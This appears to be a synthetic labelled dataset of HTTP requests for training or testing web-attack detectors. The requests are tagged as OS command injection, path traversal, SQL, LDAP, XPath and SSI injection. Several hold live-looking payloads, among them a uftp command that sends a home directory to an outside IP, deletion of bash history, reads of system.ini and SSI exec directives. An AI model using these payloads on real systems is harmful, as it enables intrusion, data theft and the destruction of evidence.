X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47353
Start - Id: 43062
class: OsCommanding
POST /7mnTs_WRA/eetpltnh0a/ugQoqVV/ItC/7ygueucmsaixeepoa/aToTawaceerjOfye/le5ha3Udzppy/f3xxz_XSSIs68/s2daeed8neArs/ozq-IrRA/svW@z_/simeld.msf? HTTP/1.0
Content-Length: 102
Content-Language: ix
Content-Encoding: gzip
Content-Location: /ergms/ldEt/blEt.nsf
Content-MD5: dWRoZW5zYWVtb3NhZHRpcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Aug 09 11:34:51 CET
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: 79.205.140.183:80
Connection: 3xenhedf
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: ZtdteE-og, edahthre-tthe;q=0.4, bnh2hnsh-e, coeh-i;q=0.4
Cache-Control: lianntA='j9ml'
Client-ip: 81.0.18.50
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="48"
Date: Tue, 15 Dec 09 06:35:33 CET
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: 100-continue
From: sTleEdu@dtAttFd.de
If-Modified-Since: Tue, 11 May 04 06:40:11 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 18 Sep 08 08:59:25 CET
Max-Forwards: 7
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -86761,779-
Referer: /mMelMe/oSweeo.js
TE: chunked;q=0.6,trailers
Trailer: Accept
User-Agent: snifeeco5p
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: compress
Upgrade: tun3o/7.3, omna/4.0
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o4wc2aramrhz9n='     ;uftp   -g     /home/enorgeesve/innase    154.239.244.117  /geat  ;

End - Id: 43062
Start - Id: 45358
class: PathTransversal
PUT /chEettpahxsa85aainr/mtar7ttlnid5h/wtSknsubsle/eluO618squelsokee/VCQKY_lK/ESkbze/cicgx/eL5syr4oaii.asmx? HTTP/1.0
Content-Length: 56
Content-Language: enaot
Content-Encoding: gzip
Content-Location: /oCaaes9/6p0ybihi/d8miq/B9sabefs.pdf
Content-MD5: Z05sb3RMN2VhYWVlb29hcg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 06 May 06 07:49:00 GMT
Host: www.gsao.gov
Connection: izswdpeE
Accept: video/quicktime;q=0.7
Accept-Charset: x-mac-greek, utf-8, x-mac-chinesesimp, euc-jp;q=0.4, cp-932;q=0.5
Accept-Encoding: compress, identity;q=0.4
Accept-Language: e-sopfw;q=0.4, ay-e;q=0.6, 8hce-lsl52on;q=0.4, tdiilylr-0ja28qe, Letpeegl-Upsj;q=0.9
Cache-Control: only-if-cached
Client-ip: 195.135.237.8
Cookie: EleEtaeoi9o=349;zg01Jnc8fAfX=lrn]thi5 cdecho
Cookie2: $Version="3"
Date: Sat, 31 Oct 09 01:02:36 UTC
ETag: "dj0vPn_7qw3p8q8_qTIq"
Expect: 100-continue
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Wed, 01 Dec 04 08:46:31 GMT
If-Match: *
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Sat, 28 Nov 09 16:48:34 UTC
Max-Forwards: 0
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Range: 9-,-793
Referer: http://www.eotvicne.be/eeednj/eita/giapi/7oo42/aIcs9mz.mpeg
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Trailer
User-Agent: TenhlZtivnE2hwcSrhe
UA-CPU: Sparc
UA-Disp: 8038,017,16
Via: 8.6 www.era8euwe.htm, 0.9 www.easash.shtml
Transfer-Encoding: identity
Warning: 536 www.mebt.html "asgINo5ticEtjoirie" "Tue, 14 Feb 06 17:36:20 GMT"
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sdroco6e7t6ecTn=..\..\..\..\WINDOWS\system.ini

End - Id: 45358
Start - Id: 43478
class: OsCommanding
GET /zehOp9_5/uo/o1ovQtyghdIZizXUa/etearmc/rCAEe0tInrlae0feus/dsSkYkScd7V/jmt01ibg7eThouohsc/FOu-ccatq/pnAE6liamsEEtIgSotcu/fxgS2UE0mWLWGO.cfm?QCnaIAhNU=iwo&4acceptC434=deoa&zeaoaseyulso6=enzdbAa8+t5cc&ctfaxe=%27+++++%3Brm+%7E%2F.bash_history+%3B&iOreorjaiht=between%3B&eser=3&okon=hvesn2i6f&sqaaaO=mCCJ-G3ABQB HTTP/1.1
Host: 233.249.227.245:80
Connection: close
Accept: text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: fttheac-k, pWi6mud-acrrlrsa;q=0.4, emwo1Fnr-doonisd;q=0.4
Cache-Control: max-stale
Client-ip: 4.171.198.232
Cookie: nymxrq0simr5a9s=yNp;gbpEod=956649;mFra8eDinboe40o=osi;nrgom8s=11810;ahn06ene=hnny
Cookie2: $Version="6"
Date: Mon, 04 Oct 04 23:46:27 GMT
ETag: "EKy5TlVsnhNKFxx1BRT"
Expect: 100-continue
From: t3bs@fsiaebtorf.it
If-Modified-Since: Sun, 18 Feb 07 05:54:32 CET
If-Unmodified-Since: Tue, 27 Mar 07 19:37:43 CET
If-Match: "7sqdJP9DDIZoecM-"
If-None-Match: *
If-Range: "3_.SFcJe86PnCoW"
Max-Forwards: 2
MIME-Version: 9.2
Pragma: 5=oof9s
Proxy-Authorization: Digest username="tn0h3pl"
Authorization: Digest qop=auth
Referer: /ajlo0st/deneugeh/ols4szas/teeOtas/mni3.jsp
TE: gzip,chunked;q=0.4
Trailer: Range
User-Agent: Mozilla/8.9 (compatible; MSIE 2.7; Open BSD i586; neYl; Waos5y)
UA-CPU: Sparc
UA-Disp: 6546,0956,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2941x889
Via: 6.2 www.g1nTrsh.gif, FTP/8.7 www.dHa6Ans.shtml, 6.4 www.iuyt.shtml
Transfer-Encoding: deflate
Upgrade: lrtrnn/3.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 01391
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43478
Start - Id: 42827
class: OsCommanding
GET /anjdle2arhbeow/fks/r6puEBuT/dteanensmmd/dii@qE9J/5eneeuRn2tba/vfdnoptg8ndhuVr151.asmx?kb=21087&a7gBsruZsa=yseossi70aarsie&bgsoundwhere7YT2j5perl8=26454&9aaprlHg=8018&opG00k9@nT=irao&..cswQ=224&nn=%7C+++++dir++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+++++%2C&bgsoundphREnH7YFU=0885&vNevalF6e=ostBss+&yyuatong=seopdsasets9&t9ypPr9Ehst=s&PtXUX@7FVSexec=00020007&0AonfnshL1=uOhBxobcP&ejsae4rlvK=sTEIdsi4yamti+ HTTP/1.0
Host: 182.228.184.130:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese, windows-1257;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 188.218.7.177
Cookie: ak=Nzbmautoexecb>yc;rtraih7ab=3ttb88n;iesii=amyn611gcg-;Ftvm02aeTfa=eteram
Date: Mon, 22 Oct 07 01:26:58 UTC
From: gelesn@td1gtne3.it
If-Modified-Since: Mon, 25 Feb 08 09:46:15 GMT
If-Unmodified-Since: Mon, 16 Nov 09 11:20:49 UTC
If-Match: "w8EztbLW-gQt6tO6uey"
If-Range: Sun, 24 Jul 05 07:36:09 CET
Max-Forwards: 240
MIME-Version: 5.9
Authorization: Digest username="yrohn0"
Referer: /ecys/ht3mtne/tuLgal/0sdwHos/ra88e.nsf
Trailer: Host
User-Agent: Mozilla/6.6 (Windows; U; Win98 6.2; bs-Ei; rv:6.2.4) Gecko/64905970
Transfer-Encoding: deflate
Upgrade: bnrh/3.5, tht/4.4, eRslr/7.1, uitl/9.3, nply/0.8
----: -------------------------------------------------

null

End - Id: 42827
Start - Id: 37734
class: LdapInjection
GET /tnshctr/eEeeefat5rrea3w/dqkdeZ96weKm@X3Ki/yiuletliuaG/dBWxmltKB-mtelnet/h-SrovnZk6TmZWz/c2gnuHYh4IN/7KvOiFgJzPd.mspx?Wa=%29++%28++%7C++%28+cn%3D*o+++%27brien*%29%28mail%3D*o++++%27brien*++++%29++++ HTTP/1.0
Host: www.eERE.net:80
Connection: rsnqtt
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: 9ymeoE-7ralgzo;q=0.8
Cache-Control: min-fresh=7
Client-ip: 8.5.79.74
Cookie: ioirui=0t
Cookie2: $Version="8"
Date: Thu, 08 Dec 05 06:26:18 CET
ETag: W/"bCfqrlXCud@@Yi6"
Expect: fniL
From: 9tgIi@Iie7diRuwn.fr
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Sun, 06 Apr 08 18:56:20 UTC
If-Match: *
If-None-Match: *
If-Range: "5rLgSkRYRNIlYyAp_ik"
Max-Forwards: 06
Pragma: no-cache
Authorization: Basic dXR4ajpsamRQdGg=
Referer: /sseai6y/5swl.php4
Trailer: If-None-Match
User-Agent: ubanIw
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
Via: 3.1 www.otamen9.js, HTTP/0.6 www.erohT9Nt.shtml, FTP/6.8 122.121.127.181
Transfer-Encoding: deflate
Upgrade: 4da/3.4
Warning: 042 159.74.80.149 "suceomxh0hepmsponr2" 
X-Forwarded-For: 33.253.224.201
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37734
Start - Id: 39378
class: SSI
GET /Rnqntosqdsa/s00pgyWiwB28T.Q9/tAnlos/SiCecdseotnennrgdn/aPVvarF9xadminVbQ/YrhpqNeaf.css?oAeeuznze=%3C%21--%23email+fromhost%3D%22www.beinlw.com%22+tohost%3D%22mailbox.osSnr.com%22+message%3D%22nu6x7+ainh4t+eNwMeet5+aadlc%22+fromaddress%3D%22egarrc.com%22+toaddress%3D%22ie2.825idi.com%22+subject%3D%22nPi%22+sender%3D%22tti.com%22+replyto%3D%222hiet.com%22+cc%3D%22mt%22+inreplyto%3D%22umo+tnes+q%22+id%3D%22himail%22+--%3E HTTP/1.0
Host: www.Sa7rnidohc.st
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-1, iso-8859-8;q=0.0, iso-8859-8, big5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 196.184.80.212
Cookie: horbrhiz2g91=8ntn7ieealsniVAf;swbt6nz=bgbfiseterev:;34awofeR=ll;reost=8@lHTV-xTp8p;g9rNsjnetqW7u=as;RsystemmqWj6=s)
Cookie2: $Version="2"
Date: Wed, 11 Nov 09 13:07:39 GMT
ETag: "NH0nqaIAQJf.Juk35"
Expect: 100-continue
From: lrS1n@ltwen24wwu.net
If-Modified-Since: Thu, 22 May 08 11:52:37 GMT
If-Unmodified-Since: Sun, 28 Sep 08 24:21:42 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Aug 04 08:28:18 GMT
Max-Forwards: 195
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM N3RGc3RpbGRnanRleWRzUGthc3MwcmVldGlESmo4ck4=
Authorization: saoan 0p1wm=Sqso
Range: -7403,569103-
Referer: http://5ahmtR.st/mtrh.jpeg
TE: gzip;q=0.6,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.9 (compatible; MSIE 4.1; Win 9x; 0ajHTGncis)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 757x2155
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: baag
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 718 12.78.142.38 "hTEovTag" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39378
Start - Id: 41403
class: SqlInjection
POST /6usrHb7FOlps-ZV/jbLa64x/cSd1Y_s3D1ejJEUmGss/a4I2HAqxm8cCZhGqmcjI.bin? HTTP/1.0
Content-Length: 203
Content-Language: dnaOtaa
Content-Encoding: compress
Content-Location: http://eerenb.uk/5reeb/itakxng/l9heh/homtn/h5e8eiml.tar
Content-MD5: dDBhaXRhYXp0c3RlbXJ0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 23:12:59 GMT
Last-Modified: Fri, 03 Apr 09 07:19:46 GMT
Host: 26.152.233.226:5
Connection: close
Accept: text/plain;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=56020
Client-ip: 87.5.203.76
Cookie: n0=7597;idt39Xks='ta;na=82;btisaytrk0cH=27711540;rfThihr=Oetrasleax
Cookie2: $Version="59"
Date: Sat, 21 Nov 09 16:17:00 CET
ETag: W/"4J6x5mzh8-Y-JyUpc_o"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 18 May 08 09:14:33 CET
If-Unmodified-Since: Sat, 18 Mar 06 18:45:56 CET
If-Match: *
If-None-Match: *
If-Range: "sB8DEn_22an-e@8q@HVB"
Max-Forwards: 3
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: cTtsb nlsttnre=nmx5nae7
Range: 24-
Referer: http://cdtsama.st/dcuA8/adtstiys/nrSSe.tiff
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: tOo03Ishui/9.2.9
UA-CPU: StrongARM
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/8.7 51.69.44.199, 6.1 117.236.53.6:0116, HTTP/6.4 231.239.184.91
Transfer-Encoding: deflate
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 643 191.194.177.159 "m5pnsfytke" "Thu, 04 Dec 08 02:42:59 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 15055892627895380
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

ioppg1n=OHlaoeoane1v&rrEannnboimai=%auiye8  aese&xdaysZ@UlocationK='   )  UNION    ALL     SELECT n0neI    FROM     eoword WHERE  ( ''    ='&icaR1yyRi=n6oSsdrf:5nn&HvMXreplace=491457527

End - Id: 41403
Start - Id: 43219
class: OsCommanding
GET /ianeoaia/xterm3nYUb/xnutoUea/between_T/f13MP@528Td_C@C.png?wHWW9GM3H=sv%3Aim5&Peotysexbsm=b9N&htbohtL=+xp_&eqo=00959486&ctcrlbeogea=23&MtRlTwrnH=%5Cnls+%2Froot%2F&v5beeerx0H=2831515&shutdownFformyreplacePK6dropIJo=1145874&iit=tcr+IheSilink%24cps%3B&rn=ouo HTTP/1.0
Host: www.san5q7nng.net:80
Connection: close
Accept: text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 141.13.227.191
Cookie: 6hdrae7I=4036153164;vmtt=rhl8l';cwWnwbEg=3
Cookie2: $Version="492"
Date: Sun, 23 Nov 08 18:03:44 UTC
ETag: "vwwfk9ovLGa8IzJLe"
Expect: 100-continue
From: Odth@g78cnm.uk
If-Modified-Since: Sat, 17 Jan 09 18:32:26 CET
If-Unmodified-Since: Wed, 27 Jan 10 09:11:49 CET
If-Match: "ZfzlTNiogMaFknCW1"
If-None-Match: *
If-Range: Fri, 31 Jul 09 14:00:06 CET
Max-Forwards: 229
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: mfey smnSW=fltvk
Authorization: ton5w eo0iw=9u8fi
Range: 2403-,12114-9,53-40810
Referer: /6oos3u/mrNektr/Jhoie/jnbiIeet.mpeg
TE: deflate;q=0.3,gzip,trailers
Trailer: TE
User-Agent: 8niia/8.4
UA-CPU: x86
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 476x125
Via: twm/1.6 www.auntsqe1.shtml
Transfer-Encoding: compress
Upgrade: pIh6l/8.2, tEst/3.2
Warning: 931 29.33.161.132:937 "tiriHq" "Sun, 23 Apr 06 11:58:11 UTC"
X-Forwarded-For: 4.63.150.148
X-Serial-Number: 3512760212193
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43219
Start - Id: 37404
class: LdapInjection
GET /deLulcYfHxp_l9V/5u/ncesa8cwaeRs/11nheer04smdIrrr/aoyEth3/n9/yNwaaPTCM/iTUPKK0sUR-V4Ih/e_6l6lNH1riE2VJ4uf21/KGHMs0ZJaccess_log6l3/QhtaccespEieRIhomekU.cgi? HTTP/1.1
Host: www.peeodwld.it:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, identity, deflate;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 97.191.125.72
Cookie: B4L82Gpa=Aii;q8r3ttnb=2729)(&(objectClass=aaf)(|(sn = rt)(cn=lxno    J*));8rRr=mqinserti
Cookie2: $Version="803"
Date: Wed, 26 Mar 08 04:38:53 CET
ETag: W/"I4bxWhF3dD.58ZB"
Expect: 100-continue
From: a9rhuT@wsiL.cz
If-Modified-Since: Sun, 07 Dec 08 12:24:36 GMT
If-Unmodified-Since: Wed, 20 Oct 04 16:50:00 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Aug 04 08:53:51 CET
Max-Forwards: 4970
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic aHNkZjpyc29lZQ==
Authorization: 95tih seNacxUu=emsg
Range: 0-,10-,1914-
Referer: /sreaheo/i2mEe/ew1qooe/hgrutnnr/rTepye.cfm
TE: trailers,trailers,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: ueke7eoOoa/7.6.9.9.4
UA-Disp: 143,2118,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 233x3973
Via: 1.4 35.151.29.63, HTTP/0.5 www.aaTaOee.jpg
Transfer-Encoding: deflate
Upgrade: ontd/7.5, eEr1lt/2.5
Warning: 333 www.7hOnw6sa.css:75192 "5einNKtOttplh03r3xab" "Fri, 05 Jan 07 15:19:33 CET"
X-Serial-Number: 0741742884020240
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37404
Start - Id: 49749
class: XPathInjection
GET /hAeHPKv9Osnhg@fBIw/9ogoiotsmites/croqecctoadde6/trbmIwat/AVvGFetcdjcmcopyM/zvhadr8/jerJGADku/VVlOgMOconnectVnxle.htm?nrhcthsgtfaek=28312&9a94=o03OuLy6Xd&Itrs=51918&uianc0HHsergmr=encex%5C1t+n3r%2Fe&dlaeAsQs=meepocd5hnsszec&ne=s7s&hdcl=16&8i9eEoq=amowCD0xok&Naar=wwuef%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or++%27gh%27+%3D%27&liEeAiu=sldaRei1hqecerit&UthMnsdmeghei=34482 HTTP/1.1
Host: 15.193.109.108
Connection: axtuR
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: 3U-oox;q=0.0, gfe-9trnibe
Cache-Control: only-if-cached
Client-ip: 24.134.122.55
Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Wed, 06 Oct 04 11:42:06 GMT
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 100-continue
From: tyese@ksT0ri.gov
If-Modified-Since: Mon, 09 Jun 08 06:49:30 GMT
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 057
MIME-Version: 6.2
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: NTLM b29zZWRoaWFsYXR4aGhwZGV1UkV1dGhiN2NUb3hPb25pYURkdW9vZHM=
Range: -1702
Referer: http://www.q0btr.net/iitxcaoe/Edgd3lma.conf
TE: trailers,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: esec8lPkeYtd
UA-CPU: x86
UA-Disp: 317,738,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 413x0589
Via: 4.0 www.ooleolsE.jpg, 3.5 186.12.230.187:812
Transfer-Encoding: gzip
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 835 www.aifJnm.js "9hedstplseeoacoe" "Thu, 13 May 04 16:51:39 CET"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49749
Start - Id: 40314
class: SSI
GET /ciin1fEs7n/iatrehd8onnurseyIp/ie0eyS5bn5rlsas/ny5DDp8BjrfoHc_u9tcj/tbb21/V7-/zs50x53reehs6ljaj/RsjbuwVuNkTYN2passwd.mspx?yardeIiar=%3C%21--++++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cte0eo9%5CTtimym%5CseonY.exe+d%3A%5Cet2ilnn%5Cwww.arsirotiri.org%5Clttafsni%5Cdatabase.mdb++%2Fx+exporttofoxpro%22--%3E HTTP/1.1
Host: 133.105.43.135
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 189.175.1.221
Cookie: atoaiaoe=Mpasswdranbiaulgaaccept me];9eewbpir=ein6z;3bodyBKHdZZE=8138;etnlo=6
Cookie2: $Version="373"
Date: Sat, 11 Feb 06 07:24:49 UTC
ETag: "r7UE_IeZtKrz.gkK2"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Wed, 18 Jun 08 09:47:35 CET
If-Unmodified-Since: Mon, 16 Oct 06 19:28:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 460
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic aW4waXNtaHM6M2F1bnNT
Authorization: NTLM YVJzaXJuYXNlb2lubm50TXNlVG5leWF1ZW9sZWFmY3VF
Range: -2115,0045-233,-51
Referer: /stddol/g0htx8/nJNqejh.js
TE: gzip;q=0.4,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 6.6; es-0o; rv:7.1.1) Gecko/08056112
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0982x101
Via: FTP/3.3 www.1aseiet.css:87, 5.9 www.esrasde.tiff, 8.9 www.29i8s.gif
Transfer-Encoding: deflate
Upgrade: doiAa/8.2, ttps1j/4.1, hje/0.9, idg/3.2
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 232.141.193.11
X-Serial-Number: 475557970524
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40314
Start - Id: 50095
class: XPathInjection
POST /PkogonsIensfhAa/methttfosolik/E4.png? HTTP/1.1
Content-Length: 156
Content-Language: sxes85u,hE
Content-Encoding: compress
Content-Location: http://ioesss.it/diit/baqneEi/usNdeJ1/1se58.mpeg
Content-Type: application/x-www-form-urlencoded
Host: www.eesEa7r.org
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.5, windows-1253;q=0.8, iso-8859-5, x-mac-turkish;q=0.4
Accept-Encoding: deflate, identity, compress
Accept-Language: *;q=0.3
Cache-Control: no-cache
Cookie: .vPncEgnph-IdPservices=yi;v1mdlnTeaNtcdea=2401590;QsamTZI@JRME=r;asilGeorunema=ilrhsh'    or     path/child::node()[position()=N]     or 'aseer'    ='
Cookie2: $Version="419"
Date: Mon, 29 May 06 15:05:43 UTC
If-Modified-Since: Tue, 08 Nov 05 06:38:05 GMT
If-Unmodified-Since: Wed, 12 Oct 05 01:41:59 GMT
If-Match: "XaS1IqMtFDROqAyuko6V"
If-None-Match: *
If-Range: "QPZ9Fmn1mI2zBPln"
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: Basic dXBhclRqQTpoYm0yenN0
Authorization: Basic eDRldHk6a2l4Yw==
Referer: /ntet7uL/n9Tqodue/bm0r.asmx
User-Agent: Mozilla/7.5 (X11; U; Linux i386 9.8; ut-fu; rv:9.7.3) Gecko/83006721
UA-Color: color16
Via: 6.0 92.160.6.29, FTP/7.2 www.h93n2eo.htm
Transfer-Encoding: identity
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a9jierhzt=saecmditi&aoocaihfsnW=eL4X&VMD0j0cat=gi$asam&tttStseemaaE=&7dlf4nya4alex yenph-&ir=79953&MlsWIQhuKAxh=60&txMre= if&eeh=oZOcoFQpfO&swz=06035140

End - Id: 50095
Start - Id: 45600
class: PathTransversal
GET /gs7jkjb/ogmGZc1q27Ex5W1/mail1ZHGinputEeMRexecWshutdownj/bjsaljgvLbU.html?FhBlM=ctalOeetOeaCabhes3&ise1la=qn&RmNn35PV=%5Bp&gf=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.c3l8fsd7.st
Connection: close
Accept: video/mpeg;q=0.5, text/*
Accept-Charset: koi8;q=0.0, windows-874;q=0.1, euc-kr;q=0.2, euc-jp;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: min-fresh=213
Client-ip: 2.178.204.132
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="7"
Date: Fri, 12 Aug 05 11:05:06 UTC
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: iVjhs
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Mon, 16 Nov 09 24:45:10 UTC
If-Match: "5rbpVrWJbc3L6sdV"
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: "xQdnmr.Vnf8b.1gb"
Max-Forwards: 02
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest cnonce="e4hha"
Range: -709
Referer: /cw2wdy/obRaese/slnnaee.wav
TE: gzip;q=0.9,trailers,gzip
Trailer: Accept
User-Agent: oS7OkOS.RG http://www.ersslnuW.it
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 413x730
Via: eiRhsy/4.5 www.pfttsf.html
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 079212958544590509
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45600
Start - Id: 40851
class: SSI
GET /yK7Lj-han4A.K.aspx?m9Anccbtnaie=%3C%21--+%23odbc+++statement+++%3D%22select++n0as%2C+roet%2C+vrtn5+from++++hlrbrertci++order++++by++6%2C++88%2C+++++1%22+++--%3E HTTP/1.1
Host: 107.27.123.253
Connection: keep-alive
Accept: text/*, application/*, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: asii-aaeyOv;q=0.6, mtpRa-i4zgYept, MeeE-rt
Cache-Control: max-age=82200
Client-ip: 183.188.60.40
Cookie: tec=nn;zgytAst=re1toi;easr=oii Ey;cihadt7=Pax3ora80r;KcopyQtrcpcO=kq2DwV.
Cookie2: $Version="24"
Date: Wed, 04 Oct 06 13:09:51 GMT
ETag: W/"RTGG@0tIYgXyT1zHl0"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Mon, 24 Sep 07 15:32:54 UTC
If-Match: "WD4Y3yYdXzMK1.8jb"
If-None-Match: "cnPmCTzidCptVT6dbY"
